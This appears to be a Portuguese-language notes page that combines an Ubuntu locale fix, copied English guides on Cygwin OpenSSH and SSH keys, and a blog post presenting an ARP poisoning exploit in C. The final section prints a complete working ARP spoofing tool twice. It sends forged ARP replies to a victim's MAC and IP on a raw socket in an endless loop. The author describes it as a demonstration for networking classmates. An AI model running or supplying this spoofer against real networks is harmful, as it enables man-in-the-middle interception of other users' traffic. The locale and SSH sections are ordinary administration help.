Mudando o default locale no Ubuntu 12.10

//============ /etc/default/locale LANG="fr_FR.UTF-8" LANGUAGE="fr_FR.UTF-8" LC_CTYPE="fr_FR.UTF-8" LC_NUMERIC="fr_FR.UTF-8" LC_TIME="fr_FR.UTF-8" LC_COLLATE="fr_FR.UTF-8" LC_MONETARY="fr_FR.UTF-8" LC_MESSAGES="fr_FR.UTF-8" LC_PAPER="fr_FR.UTF-8" LC_NAME="fr_FR.UTF-8" LC_ADDRESS="fr_FR.UTF-8" LC_TELEPHONE="fr_FR.UTF-8" LC_MEASUREMENT="fr_FR.UTF-8" LC_IDENTIFICATION="fr_FR.UTF-8" LC_ALL="fr_FR.UTF-8 //==================== /var/lib/locales/supported.d/local fr_FR.UTF-8 UTF-8 en_US.UTF-8 UTF-8 en_GB ISO-8859-1 en_GB.UTF-8 UTF-8 en_GB.ISO-8859-15 ISO-8859-15 fr_BE.UTF-8 UTF-8 fr_CA.UTF-8 UTF-8 fr_CH.UTF-8 UTF-8 fr_LU.UTF-8 UTF-8 fr_FR ISO-8859-1

Solução:

Run the command locale - it should show your current locale. Generate the locales for french: sudo locale-gen fr_FR sudo locale-gen fr_FR.UTF-8 Also, try regenerating the supported locale list by running: sudo dpkg-reconfigure locales And update/change the current default locale: sudo update-locale LANG=fr_FR.UTF-8 OUTRAS: Extra steps to try: Try: sudo update-locale LANG="fr_FR.UTF-8" LANGUAGE="fr_FR" sudo dpkg-reconfigure locales Perhaps adding LANG and LANGUAGE in /etc/environment could force a change. Try logout/login or rebooting. locale will show your current locale for the current user. Perhaps it's worth checking out these files just to be sure no local language variables are set: ~/.profile ~/.bashrc ~/.bash_profile More info: https://help.ubuntu.com/community/Locale http://serverfault.com/questions/228474/correctly-changing-default-locale-in-ubuntu-server-10-04-lts

Como usar SSH por linha de comando no Windows 7 - Cygwin

Font: http://www.howtogeek.com/howto/41560/how-to-get-ssh-command-line-access-to-windows-7-using-cygwin/

Are you comfortable with Linux/Unix and want SSH access to your Windows 7 machine? Cygwin provides this functionality and gives you a familiar environment to work with in a few simple steps.
We’re assuming you’ve got Cygwin installed and configured. If not, check out our article, How To Use Linux Commands in Windows with Cygwin to get started.

Installing OpenSSH

OpenSSH is what we’ll be using, so if you don’t have it installed, find Cygwin’s setup.exe file and run it.

You can keep all of the same defaults as when you originally set up Cygwin. On the package selection screen, search for “open” and look under the “Net” menu.

You’ll see a package called “openssh”. Click under the “New” column, where it says “Skip” until you see an X appear in the “Bin?” column. Look at the previous screenshot for where to click if you’re confused. Hit “Next” and finish up the rest of the setup process, just like you did last time.

Configuring OpenSSH in Cygwin

Unlike in most Linux distros, OpenSSH won’t automatically configure itself to run and just work. We need to perform a few easy steps. First, right-click your Cygwin shortcut, and click on “Run as administrator”:

This will make sure we have the proper privileges for everything. You’ll see an empty Cygwin window come up.

Enter the following command:

ssh-host-config

You’ll see the script generate some default files, and then you’ll be prompted for whether or not you want to enable “Privilege Separation.” It’s on by default in standard installations of OpenSSH on other systems, so go ahead and say “yes” to the prompt.

You’ll be prompted to create a new account with special privileges. Select “yes” and the script will continue.

Next, you’ll be asked if you want sshd to run as a service. This will allow you to get SSH access regardless of whether or not Cygwin is currently running, which is what we want. Go ahead and hit “yes” to continue.

Next, you’ll be asked to enter a value for the daemon. Enter the following:

ntsec

You’ll see the script give you some information on your system and then it will ask you to create a privileged account with the default username “cyg_server”. The default works well, so type “no” when it asks you if you want to use a different account name, although you can change this if you really like.

Of course, you’ll have to enter a password for this account as well.

Cygwin will show you your password in plain text for verification, so be sure you’re in a secure place. You’ll see some extra info come up and if all’s well, you’ll get a message that says it successfully completed.

You can either restart, or enter the following command to start the sshd service:

net start sshd

Now, you can type “exit” to close this Cygwin instance.

User Configuration of SSH

Next, we’ll create the appropriate SSH keys for your user account. Open up Cygwin normally, and enter the following command:

ssh-user-config

You’ll be asked to create specific keys for your user account, so use what you need. I went ahead and said “no” to the first question, and “yes” to the second.

SSH2 is more secure, so that’s what I recommend to you. After entering a password, you’ll be asked if you want to use that ID to access your machine. Type “yes”.

Next, you’ll be asked to create an SSH2 DSA ID file, if you want to use password-less access. I declined at this step.

That’s it! You’re all configured. If you want to test your configuration really quickly, enter the following command in your Cygwin window:

ssh –v localhost

The –v option stands for “verbose” and gives you all of the details of the process. You’ll be asked if you want to continue connecting, so enter “yes” and then enter your password at the prompt. Remember that when you enter your username, it is case-sensitive!

If everything worked out well, you’ll see a normal bash prompt.

Minor Issues

If you find yourself stuck at any of the configuration steps, make sure that the Windows User Account you’re running has Administrative access. You may get weird errors if you try to run the host configuration as a normal user, so make sure you run Cygwin with admin privileges during that step. If, when you exit, you get a prompt about leaving your batch jobs running, you can hit “no” to terminate them.
Lastly, if you test SSH access from another machine and get an error, make sure that your firewall isn’t blocking access to port 22 (or 23 if you’re using SFTP).

---

This works extremely well if you like the ability to get SSH/SFTP access to your files on a Windows 7 machine and you also want a familiar shell to do that with. Cygwin mounts Windows drives to “/cygdrive/driveletter” in case you were wondering. ;-)

Font: https://help.ubuntu.com/12.10/serverguide/openssh-server.html

SSH Keys

SSH keys allow authentication between two hosts without the need of a password. SSH key authentication uses two keys, a private key and a public key.

To generate the keys, from a terminal prompt enter:

ssh-keygen -t dsa 

This will generate the keys using the Digital Signature Algorithm (DSA) method. During the process you will be prompted for a password. Simply hit Enter when prompted to create the key.

By default the public key is saved in the file ~/.ssh/id_dsa.pub, while ~/.ssh/id_dsa is the private key. Now copy the id_dsa.pub file to the remote host and append it to ~/.ssh/authorized_keys by entering:

ssh-copy-id username@remotehost 

Finally, double check the permissions on the authorized_keys file, only the authenticated user should have read and write permissions. If the permissions are not correct change them by: 

chmod 600 .ssh/authorized_keys 

You should now be able to SSH to the host without being prompted for a password.

Exploit - ARP Poisoning em C

Créditos à: Romero Júnior.

blog.romerojunior.com/indice

Para começar a envolver um pouco de programação [direcionada a redes] nas postagens, resolvi começar com um exploit que escrevi a algumas noites atrás para demonstrar um ataque de ARP Poisoning para meus colegas de turma da Cisco Networking Academy.

O código é bastante simples e não usa mais do que qualquer distribuição Linux oferece por padrão em seu banco de “includes” (/usr/include/), nele iremos estabelecer comunicação direta com a nossa NIC, tratando assim de uma codificação low-level, o que pode parecer incomodo para alguns, mas não há nenhum bicho de sete cabeças, acreditem que a grande dificuldade é compreender o funcionamento de dois protocolos básicos, o primeiro deles [e mais óbvio] é o Address Resolution Protocol, que se encontra na camada 3 (assim como os protocolos IPv4 e IPv6), observe abaixo sua representação gráfica:

Logo abaixo dele se econtra o Ethernet (IEEE 802.3), não entrarei em muitos detalhes sobre o Ethernet e suas vertentes,  sua implementação [que se limitará ao seu header] independe de seu padrões específicos, abaixo segue sua representação gráfica:

O funcionamento do ARP é simples, e para encomizar palavras (e não roubar o foco da postagem, que de fato é a programação), abaixo segue uma ilustração que exemplifica o seu funcionamento:Finalmente, vamos ao que interessa! O código para explorar a vulnerabilidade nessa infraestrutura é o seguinte: [Compilado em Ubuntu 10.10, ECLIPSE IDE C/C++ (GCC)]

#include<stdio.h> #include<stdlib.h> #include<sys/socket.h> #include<features.h> #include<net/if.h> #include<linux/if_packet.h> #include<linux/if_ether.h> #include<errno.h> #include<sys/ioctl.h> #include<net/ethernet.h> #include<net/if_arp.h> #include<arpa/inet.h> #include<netinet/in.h> // por Romero Júnior em 01/10/2011 //* Definição das variáveis globais: char * SRC_ETHER_ADDR; char * DST_ETHER_ADDR; char * SRC_IP; char * DST_IP; char * INTERFACE; // Estrutura de dados do cabeçalho Ethernet: typedef struct EthernetHeader{ // Informações básicas sobre tipagem: // Unsigned char = 0 a 255 (ou 00 a FF) = 1 byte // Short (short integer) = 2 bytes unsigned char destination[6]; // 48 bits (endereço MAC de destino) unsigned char source[6]; // 48 bits (endereço MAC de origem) unsigned short protocol; // Exemplo: 0x0806 = ARP // 0x0800 = IPv4 // 0x88DD = IPv6 }EthernetHeader; // Estrutura de dados do cabeçalho ARP: typedef struct ArpHeader{ unsigned short hardware_type; // 2 bytes // Exemplo: 0x0001 = Ethernet unsigned short protocol_type; // 2 bytes // Exemplo: unsigned char hard_addr_len; // 1 byte unsigned char prot_addr_len; // 1 byte unsigned short opcode; // 2 bytes unsigned char source_hardware[6]; // 48 bits unsigned char source_ip[4]; // 32 bits unsigned char dest_hardware[6]; // 48 bits unsigned char dest_ip[4]; // 32 bits }ArpHeader; int CreateRawSocket(int protocol_to_use){ int rawsock; // int = 4 bytes (32 bits) // Básico sobre função "socket": // Se houver erros, retornará o valor -1. // PF_PACKET = trabalha a nivel da NIC // SOCK_RAW = dominio // htons = retorna o código do protocolo a ser usado. if((rawsock = socket(PF_PACKET, SOCK_RAW, htons(protocol_to_use))) == -1){ perror("Erro ao criar raw socket: "); exit(-1); } return rawsock; } int BindRawSocketToInterface(char *device, int rawsock, int protocol){ // Crio duas estruturas baseadas no tipo sockaddr_ll e ifreq: struct sockaddr_ll sll; struct ifreq ifr; // Zero o conteudo delas, setando tudo para 00000(...) bzero(&sll, sizeof(sll)); bzero(&ifr, sizeof(ifr)); strncpy((char *)ifr.ifr_name, device, IFNAMSIZ); if((ioctl(rawsock, SIOCGIFINDEX, &ifr)) == -1){ perror("Erro ao associar o indice de interface!\n"); exit(-1); } // Associa o pacote a interface: sll.sll_family = AF_PACKET; sll.sll_ifindex = ifr.ifr_ifindex; sll.sll_protocol = htons(protocol); if((bind(rawsock, (struct sockaddr *)&sll, sizeof(sll)))== -1){ perror("Erro ao associar o raw socket a interface!\n"); exit(-1); } return 1; } int SendRawPacket(int rawsock, unsigned char *pkt, int pkt_len){ int sent = 0; // A parte fácil: escrever no socket! if((sent = write(rawsock, pkt, pkt_len)) != pkt_len){ perror("Não foi possível enviar o socket!"); return 0; } return 1; } // Usando a estrutura previamente criada, vamos agora de fato criar a // função para gerar o nosso header Ethernet: EthernetHeader* CreateEthernetHeader(char *src_mac, char *dst_mac, int protocol){ EthernetHeader *ethernet_header; // Alocando dinamicamente espaço em memória para sua utilização: // (Apenas 1 simples bit alocado no espaço errado o trabalho será prejudicado!) ethernet_header = (EthernetHeader *)malloc(sizeof(EthernetHeader)); memcpy(ethernet_header->source, (void *)ether_aton(src_mac), 6); memcpy(ethernet_header->destination, (void *)ether_aton(dst_mac), 6); ethernet_header->protocol = htons(protocol); return (ethernet_header); } ArpHeader* CreateArpHeader(void){ ArpHeader *arp_header; in_addr_t temp; arp_header = (ArpHeader *)malloc(sizeof(struct ArpHeader)); arp_header->hardware_type = htons(ARPHRD_ETHER); // 0x0001 - Ethernet arp_header->protocol_type = htons(ETHERTYPE_IP); // 0x0800 - IPv4 arp_header->hard_addr_len = 6; arp_header->prot_addr_len = 4; arp_header->opcode = htons(ARPOP_REPLY); // 0x0002 - Reply memcpy(arp_header->source_hardware, (void *)ether_aton(SRC_ETHER_ADDR), 6); temp = inet_addr(SRC_IP); memcpy(&(arp_header->source_ip), &temp, 4); memcpy(arp_header->dest_hardware, (void *)ether_aton(DST_ETHER_ADDR), 6); temp = inet_addr(DST_IP); memcpy(&(arp_header->dest_ip), &temp, 4); return arp_header; } void error(){ printf("ARP Poisoning [interface][source IP][spoof mac address][mac da vitima][ip da vitima]"); exit(1); } main(int argc, char **argv){ int raw; unsigned char *packet; EthernetHeader *ethernet_header; ArpHeader *arp_header; int pkt_len; if(argv[1] == NULL){ error(); } if(argv[2] == NULL){ error(); } if(argv[3] == NULL){ error(); } if(argv[4] == NULL){ error(); } if(argv[5] == NULL){ error(); } INTERFACE = argv[1]; SRC_IP = argv[2]; SRC_ETHER_ADDR = argv[3]; DST_ETHER_ADDR = argv[4]; DST_IP = argv[5]; raw = CreateRawSocket(ETH_P_ALL); BindRawSocketToInterface(INTERFACE, raw, ETH_P_ALL); ethernet_header = CreateEthernetHeader(SRC_ETHER_ADDR, DST_ETHER_ADDR, ETHERTYPE_ARP); arp_header = CreateArpHeader(); pkt_len = sizeof(EthernetHeader) + sizeof(ArpHeader); packet = (unsigned char *)malloc(pkt_len); memcpy(packet, ethernet_header, sizeof(EthernetHeader)); memcpy((packet + sizeof(EthernetHeader)), arp_header, sizeof(ArpHeader)); //o grande momento: while(1){ if(!SendRawPacket(raw, packet, pkt_len)){ perror("Erro ao enviar pacote"); }else{ printf("ARP enviado com sucesso!\n"); } sleep(5); } free(ethernet_header); free(arp_header); free(packet); close(raw); return 0; }

#include<stdio.h> #include<stdlib.h> #include<sys/socket.h> #include<features.h> #include<net/if.h> #include<linux/if_packet.h> #include<linux/if_ether.h> #include<errno.h> #include<sys/ioctl.h> #include<net/ethernet.h> #include<net/if_arp.h> #include<arpa/inet.h> #include<netinet/in.h> // por Romero Júnior em 01/10/2011 //* Definição das variáveis globais: char * SRC_ETHER_ADDR; char * DST_ETHER_ADDR; char * SRC_IP; char * DST_IP; char * INTERFACE; // Estrutura de dados do cabeçalho Ethernet: typedef struct EthernetHeader{ // Informações básicas sobre tipagem: // Unsigned char = 0 a 255 (ou 00 a FF) = 1 byte // Short (short integer) = 2 bytes unsigned char destination[6]; // 48 bits (endereço MAC de destino) unsigned char source[6]; // 48 bits (endereço MAC de origem) unsigned short protocol; // Exemplo: 0x0806 = ARP // 0x0800 = IPv4 // 0x88DD = IPv6 }EthernetHeader; // Estrutura de dados do cabeçalho ARP: typedef struct ArpHeader{ unsigned short hardware_type; // 2 bytes // Exemplo: 0x0001 = Ethernet unsigned short protocol_type; // 2 bytes // Exemplo: unsigned char hard_addr_len; // 1 byte unsigned char prot_addr_len; // 1 byte unsigned short opcode; // 2 bytes unsigned char source_hardware[6]; // 48 bits unsigned char source_ip[4]; // 32 bits unsigned char dest_hardware[6]; // 48 bits unsigned char dest_ip[4]; // 32 bits }ArpHeader; int CreateRawSocket(int protocol_to_use){ int rawsock; // int = 4 bytes (32 bits) // Básico sobre função "socket": // Se houver erros, retornará o valor -1. // PF_PACKET = trabalha a nivel da NIC // SOCK_RAW = dominio // htons = retorna o código do protocolo a ser usado. if((rawsock = socket(PF_PACKET, SOCK_RAW, htons(protocol_to_use))) == -1){ perror("Erro ao criar raw socket: "); exit(-1); } return rawsock; } int BindRawSocketToInterface(char *device, int rawsock, int protocol){ // Crio duas estruturas baseadas no tipo sockaddr_ll e ifreq: struct sockaddr_ll sll; struct ifreq ifr; // Zero o conteudo delas, setando tudo para 00000(...) bzero(&sll, sizeof(sll)); bzero(&ifr, sizeof(ifr)); strncpy((char *)ifr.ifr_name, device, IFNAMSIZ); if((ioctl(rawsock, SIOCGIFINDEX, &ifr)) == -1){ perror("Erro ao associar o indice de interface!\n"); exit(-1); } // Associa o pacote a interface: sll.sll_family = AF_PACKET; sll.sll_ifindex = ifr.ifr_ifindex; sll.sll_protocol = htons(protocol); if((bind(rawsock, (struct sockaddr *)&sll, sizeof(sll)))== -1){ perror("Erro ao associar o raw socket a interface!\n"); exit(-1); } return 1; } int SendRawPacket(int rawsock, unsigned char *pkt, int pkt_len){ int sent = 0; // A parte fácil: escrever no socket! if((sent = write(rawsock, pkt, pkt_len)) != pkt_len){ perror("Não foi possível enviar o socket!"); return 0; } return 1; } // Usando a estrutura previamente criada, vamos agora de fato criar a // função para gerar o nosso header Ethernet: EthernetHeader* CreateEthernetHeader(char *src_mac, char *dst_mac, int protocol){ EthernetHeader *ethernet_header; // Alocando dinamicamente espaço em memória para sua utilização: // (Apenas 1 simples bit alocado no espaço errado o trabalho será prejudicado!) ethernet_header = (EthernetHeader *)malloc(sizeof(EthernetHeader)); memcpy(ethernet_header->source, (void *)ether_aton(src_mac), 6); memcpy(ethernet_header->destination, (void *)ether_aton(dst_mac), 6); ethernet_header->protocol = htons(protocol); return (ethernet_header); } ArpHeader* CreateArpHeader(void){ ArpHeader *arp_header; in_addr_t temp; arp_header = (ArpHeader *)malloc(sizeof(struct ArpHeader)); arp_header->hardware_type = htons(ARPHRD_ETHER); // 0x0001 - Ethernet arp_header->protocol_type = htons(ETHERTYPE_IP); // 0x0800 - IPv4 arp_header->hard_addr_len = 6; arp_header->prot_addr_len = 4; arp_header->opcode = htons(ARPOP_REPLY); // 0x0002 - Reply memcpy(arp_header->source_hardware, (void *)ether_aton(SRC_ETHER_ADDR), 6); temp = inet_addr(SRC_IP); memcpy(&(arp_header->source_ip), &temp, 4); memcpy(arp_header->dest_hardware, (void *)ether_aton(DST_ETHER_ADDR), 6); temp = inet_addr(DST_IP); memcpy(&(arp_header->dest_ip), &temp, 4); return arp_header; } void error(){ printf("ARP Poisoning [interface][source IP][spoof mac address][mac da vitima][ip da vitima]"); exit(1); } main(int argc, char **argv){ int raw; unsigned char *packet; EthernetHeader *ethernet_header; ArpHeader *arp_header; int pkt_len; if(argv[1] == NULL){ error(); } if(argv[2] == NULL){ error(); } if(argv[3] == NULL){ error(); } if(argv[4] == NULL){ error(); } if(argv[5] == NULL){ error(); } INTERFACE = argv[1]; SRC_IP = argv[2]; SRC_ETHER_ADDR = argv[3]; DST_ETHER_ADDR = argv[4]; DST_IP = argv[5]; raw = CreateRawSocket(ETH_P_ALL); BindRawSocketToInterface(INTERFACE, raw, ETH_P_ALL); ethernet_header = CreateEthernetHeader(SRC_ETHER_ADDR, DST_ETHER_ADDR, ETHERTYPE_ARP); arp_header = CreateArpHeader(); pkt_len = sizeof(EthernetHeader) + sizeof(ArpHeader); packet = (unsigned char *)malloc(pkt_len); memcpy(packet, ethernet_header, sizeof(EthernetHeader)); memcpy((packet + sizeof(EthernetHeader)), arp_header, sizeof(ArpHeader)); //o grande momento: while(1){ if(!SendRawPacket(raw, packet, pkt_len)){ perror("Erro ao enviar pacote"); }else{ printf("ARP enviado com sucesso!\n"); } sleep(5); } free(ethernet_header); free(arp_header); free(packet); close(raw); return 0; }